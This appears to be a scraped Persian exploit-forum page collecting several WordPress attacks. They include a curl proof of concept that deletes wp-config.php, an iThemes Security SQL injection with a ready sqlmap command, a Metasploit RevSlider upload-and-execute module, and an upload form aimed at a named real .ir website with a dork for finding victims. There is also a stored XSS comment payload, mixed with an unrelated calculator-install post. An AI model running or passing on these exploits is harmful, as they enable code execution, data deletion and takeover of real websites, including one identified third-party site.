  20. # Exploit Title: Wordpress 4.9.6 Arbitrary File Deletion Vulnerability # Google Dork: N/A # Date: 2018-09-3 # Exploit Author: Rednofozi # Vendor Homepage: http://www.wordpress.org # Software Link:http://www.wordpress.org/download # Affected Version: 4.9.6 # Tested on: php7 mysql5 # CVE : N/A # Proof Of Concept ************************************************************************** Step 1: ``` curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ``` Step 2: ``` curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' ``` ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2000
  21. # Exploit Title: WordPress Plugin iThemes Security 7.0.2 - Authenticated SQL Injection # Exploit Author: Rednofozi # Website: https://َanonysec.org # Vendor Homepage: https://ithemes.com/ # Software Link: https://wordpress.org/plugins/better-wp-security/ # Version/s: 7.0.2 and below # Patched Version: 7.0.3 # CVE : 2018-12636 #me :rednofozi@yahoo.com Plugin description: iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress. Description: WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php. Technical details: Parameter orderby is vulnerable because backend variable $sort_by_column is not escaped. File: better-wp-security/core/admin-pages/logs-list-table.php Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) { Line 272: $ sort_by_column = $_GET[' orderby ']; File: better-wp-security/core/lib/log-util.php Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column )); Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin: http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0 Using SQLMAP: sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2001
  22. petya

    Linux نصب ماشین حساب gnome روی ubuntu

    یکی از مورد نیاز ترین ابزار سیستم عامل ها ماشین حساب است اگر شما یک توضیعی برپایه دبیان ساخته اید میتوانید با دستور زیر ماشین حساب gnome را نصب و راه اندازی کنید و در سیستم عاملتان قرار دهید sudo snap install gnome-calculator عکس ماشین حساب
  23. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end
  24. ########################################## # Exploit Title : IRan site wordpress Arbitary File Upload # Dork : inurl:/plupload/ -inurl:(php) intitle:index of site:ir # Date : 2018 # Exploit Author: anonysec # Category: Webapps # Language: PHP # Tested on: windows 10 / FireFox #myteam:https://anonysec.org/ Info : ______________________________________________________________________ #view : https://www.ariarockwool.ir/wp-includes/js/ #Test Upload :https://www.ariarockwool.ir/wp-includes/js/plupload/l/media/vendor/plupload/examples/upload.php ______________________________________________________________________ #Tools : <!DOCTYPE html> <html> <body> <form action="https://www.ariarockwool.ir/wp-includes/js/plupload/upload.php" method="post" enctype="multipart/form-data"> <input type="file" name="file" id="file"> <input type="submit" value="Upload" name="submit"> </form> </body> </html> ______________________________________________________________________ # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1978
  25. مهاجم با ارسال کد جاوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
×
×
  • جدید...